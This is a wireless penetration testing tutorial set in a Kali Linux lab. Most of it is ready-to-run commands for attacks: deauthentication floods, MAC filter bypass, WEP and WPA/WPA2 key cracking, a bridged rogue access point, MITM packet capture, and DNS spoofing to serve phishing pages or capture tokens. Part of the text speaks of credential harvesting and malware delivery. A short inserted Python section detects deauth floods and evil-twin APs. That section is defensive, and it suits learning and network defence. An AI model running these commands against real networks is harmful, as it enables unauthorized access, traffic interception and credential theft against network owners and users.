Establishing a controlled wireless testbed requires specific hardware and software configurations to safely execute experiments. A penetration testing workstation running Kali Linux serves as the attacker machine, while a secondary device operates as the target. The infrastructure typically includes a wireless router capable of WEP/WPA/WPA2 configurations, a USB wireless adapter supporting packet injection and monitor mode, and a stable network connection. Kali Linux provides native support for most chipset drivers, but verifying hardware compatibility beforehand prevents workflow interruptions.
Testbed Configuration
Configure the wireless router to broadcast a custom SSID, such as TestNet, initially with open authentication to simplify initial connectivity testing. Connect the attacker machine via Ethernet to access the router's management interface, typically found at 192.168.0.1. Modify the SSID identifier and disable encryption temporarily. Save the configuration and reboot the router if required. Verify the broadcast by scanning available networks from the target device.
Insert the USB wireless adapter into the Kali machine. Identify the interface name using ip link show. Assuming the adapter initializes as wlan1, bring the interface online:
ip link set wlan1 up
ip addr show wlan1
Confirm the MAC address matches the adapter's hardware sticker. Kali automatically loads the necessary kernel modules for supported chipsets, eliminating manual driver compilation in most cases.
Connect to the test network using standard wireless utilities:
iwconfig wlan1 essid "TestNet"
iwconfig wlan1
Assign a static IP within the router's subnet and verify connectivity:
ip addr add 192.168.0.10/24 dev wlan1
ping -c 3 192.168.0.1
Successful ARP resolution and ICMP replies confirm the link is established.
Monitor Mode and Frame Inspection
Wireless security assessments rely on the ability to capture all traffic within range, regardless of the destination MAC address. This requires switching the adapter to monitor mode. Use the aircrack-ng suite to handle interface creation safely:
airmon-ng check kill
airmon-ng start wlan1 11
The command generates a monitor interface, typically mon1, locked to channel 11. Verify its status:
iwconfig mon1
Launch a packet analyzer to inspect the captured frames:
wireshark -k -i mon1 &
Wireless frames consist of management, control, and data types. Management frames handle authentication, association, and beaconing. Control frames manage medium access (RTS/CTS/ACK). Data frames carry the actual payload. Apply display filters in the packet analyzer to isolate specific traffic:
- Management frames: wlan.fc.type == 0
- Control frames: wlan.fc.type == 1
- Data frames: wlan.fc.type == 2
- Beacon frames: wlan.fc.type_subtype == 8
Unencrypted management and control frames transmit sensitive metadata in plaintext. Data payloads may be encrypted, but headers remain visible. This visibility enables passive reconnaissance and active frame injection.
Bypassing Authentication Mechanisms
Hidden SSID Detection
Broadcasting SSIDs is optional. Administrators often disable beacon broadcasts to reduce visibility. However, client probe requests reveal the target network name when devices attempt to reconnect. Monitor probe responses to extract hidden identifiers:
tcpdump -i mon1 -nn -s 0 -w probe_capture.pcap wlan type mgt subtype probe-resp
If no active clients are present, force reassociation using deauthentication frames:
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 mon1
The attack disrupts active sessions, triggering clients to broadcast probe requests containing the SSID. Capture the exchange to retrieve the network identifier.
MAC Address Filtering
MAC filtering restricts access based on hardware addresses. Since wireless frames transmit source MAC addresses in plaintext, filters are trivial to bypass. Identify an authorized client using traffic analysis:
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 11 mon1
Once a valid client MAC is identified, spoof the adapter address:
ip link set wlan1 down
macchanger -m 11:22:33:44:55:66 wlan1
ip link set wlan1 up
Reattempt association. The router accepts the spoofed address as legitimate, granting network access without credential verification.
Exploiting WEP and WPA/WPA2 Vulnerabilities
WEP Key Recovery
Wired Equivalent Privacy (WEP) relies on RC4 with a short initialization vector (IV), making it mathematically vulnerable. Successful exploitation requires capturing a sufficient volume of IVs. Initialize packet capture:
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 11 --write wep_capture mon1
Accelerate IV generation by replaying ARP requests:
aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 mon1
Once data volume exceeds several thousand packets, initiate the cracking routine:
aircrack-ng wep_capture-01.cap
The tool analyzes IV collisions and derives the plaintext key. Recovery succeeds regardless of key length, rendering the encryption obsolete.
WPA/WPA2 PSK Cracking
Wi-Fi Protected Access (WPA) replaces static keys with dynamic session encryption. Pre-Shared Key (PSK) networks are vulnerable to offline dictionary attacks targeting the four-way handshake. Capture the handshake during client authentication:
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 11 --write wpa_capture mon1
Force a handshake capture by deauthenticating connected clients:
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF mon1
Verify handshake capture in the capture file. Proceed with dictionary-based cracking:
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
Precomputing Pairwise Master Keys (PMK) accelerates the process. Generate a PMK file for the target SSID:
genpmk -f custom_wordlist.txt -d precomputed_pmk.db -s "TestNet"
Use optimized tools like Pyrit or aircrack-ng with the PMK database to reduce computational overhead during brute-force attempts.
Rogue Access Point Deployment
Deploying unauthorized access points allows traffic interception and network pivoting. Create a software-based AP using airbase-ng:
airbase-ng -e "CorporateNet" -c 6 -a AA:BB:CC:DD:EE:FF mon1 &
The tool spawns a virtual interface (at0). Bridge this interface with the wired network adapter to route traffic:
ip link add br-rogue type bridge
ip link set eth0 master br-rogue
ip link set at0 master br-rogue
ip link set br-rogue up
Enable IP forwarding and configure NAT if internet access is required:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Clients connecting to the rogue AP receive DHCP leases from the upstream network, granting the attacker full visibility into LAN traffic.
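Seen from the defender's side, the deauthentication floods used in the hidden-SSID and handshake sections and a rogue AP beaconing an existing SSID are both visible in the management frames described under Monitor Mode and Frame Inspection. The following Python is an added example, not code from the original page: it decodes the frame-control type/subtype and MAC header of constructed 802.11 frames and flags both patterns. The BSSIDs, the SSID TestNet, the sample frames and the threshold of five deauth frames are assumed values.

```python
from collections import Counter

# 802.11 frame control (byte 0): bits 2-3 = type, bits 4-7 = subtype.
MGMT, CTRL, DATA = 0, 1, 2
BEACON, DEAUTH = 8, 12

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_frame(frame: bytes) -> dict:
    """Decode type/subtype and the MAC-header addresses of a raw 802.11 frame
    (radiotap header already stripped). Beacons also yield the SSID from
    tag 0, which follows the 12 bytes of fixed beacon fields."""
    fc = frame[0]
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22])}
    if info["type"] == MGMT and info["subtype"] == BEACON:
        body = frame[24 + 12:]
        if body and body[0] == 0:  # tag 0 = SSID; length 0 means hidden
            info["ssid"] = body[2:2 + body[1]].decode(errors="replace")
    return info

def analyze(frames, authorized: dict, deauth_threshold: int = 5) -> dict:
    """Flag deauth floods (many deauth frames claiming one BSSID) and evil
    twins (an authorized SSID beaconed by a BSSID not on its allow-list)."""
    deauths, twins = Counter(), set()
    for f in map(parse_frame, frames):
        if f["type"] == MGMT and f["subtype"] == DEAUTH:
            deauths[f["bssid"]] += 1
        elif f.get("ssid") in authorized and f["bssid"] not in authorized[f["ssid"]]:
            twins.add((f["ssid"], f["bssid"]))
    return {"deauth_flood": sorted(b for b, n in deauths.items() if n >= deauth_threshold),
            "evil_twin": sorted(twins)}

# Constructed sample frames (assumed values, not a real capture).
def mgmt_frame(subtype: int, dst: bytes, src: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    fc = bytes([(subtype << 4) | (MGMT << 2), 0])       # frame control, no flags
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body  # duration, addrs, seq

def beacon(bssid: bytes, ssid: bytes) -> bytes:
    fixed = b"\x00" * 8 + b"\x64\x00" + b"\x11\x04"   # timestamp, interval, capability
    return mgmt_frame(BEACON, b"\xff" * 6, bssid, bssid, fixed + bytes([0, len(ssid)]) + ssid)

AP, ROGUE, CLIENT = (bytes.fromhex(h) for h in ("aabbccddeeff", "0011223344ff", "112233445566"))
SAMPLE = [beacon(AP, b"TestNet"), beacon(ROGUE, b"TestNet")] + \
         [mgmt_frame(DEAUTH, CLIENT, AP, AP, b"\x07\x00")] * 6   # reason 7, 6 frames

def run_sample() -> dict:
    return analyze(SAMPLE, {"TestNet": {mac_str(AP)}})
```

On a live capture the same parse_frame logic applies to frames read from the monitor interface once the radiotap header is removed; the allow-list of BSSIDs per SSID is what turns beacon parsing into rogue-AP detection.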
Client-Side Exploitation
Honeypot and ESSID Probing
Wireless clients continuously broadcast probe requests for previously connected networks. Create honeypot APs matching common enterprise or public SSIDs. Clients automatically associate if signal strength is sufficient. This technique facilitates credential harvesting and malware delivery without user interaction.
Caffe Latte and Bit-Flipping
Caffe Latte attacks target cached WEP keys on roaming clients. By spoofing an AP and capturing client ARP requests, an attacker can perform bitwise XOR operations on encrypted payloads to generate valid ARP responses. Repeated injection floods the network with IVs, enabling rapid WEP key recovery even when the legitimate AP is offline. Modern variants like Hirte extend this methodology to handle arbitrary frame types.
Advanced Traffic Manipulation
Man-in-the-Middle Positioning
Combining rogue AP deployment with traffic bridging creates a transparent MITM environment. All client traffic passes through the attacker's host, enabling deep packet inspection. Launch a sniffer on the virtual interface:
tcpdump -i at0 -w mitm_dump.pcap
Unencrypted HTTP credentials, session cookies, and internal service requests become immediately accessible.
DNS Spoofing and Session Hijacking
Intercept DNS queries to redirect traffic to attacker-controlled servers. Configure a host mapping file:
8.8.8.8 google.com
192.168.0.10 www.target-app.com
Launch the spoofing utility against the bridge interface:
dnsspoof -i br-rogue -f dns_hosts.txt
Requests to specified domains resolve to the attacker's IP. Combine with a local web server (python3 -m http.server 80) to serve phishing pages or capture authentication tokens. Tools like ettercap or mitmproxy further enhance content modification capabilities, allowing real-time HTML injection and cookie manipulation. Controlling the data link layer effectively compromises all higher-layer application protocols lacking transport encryption.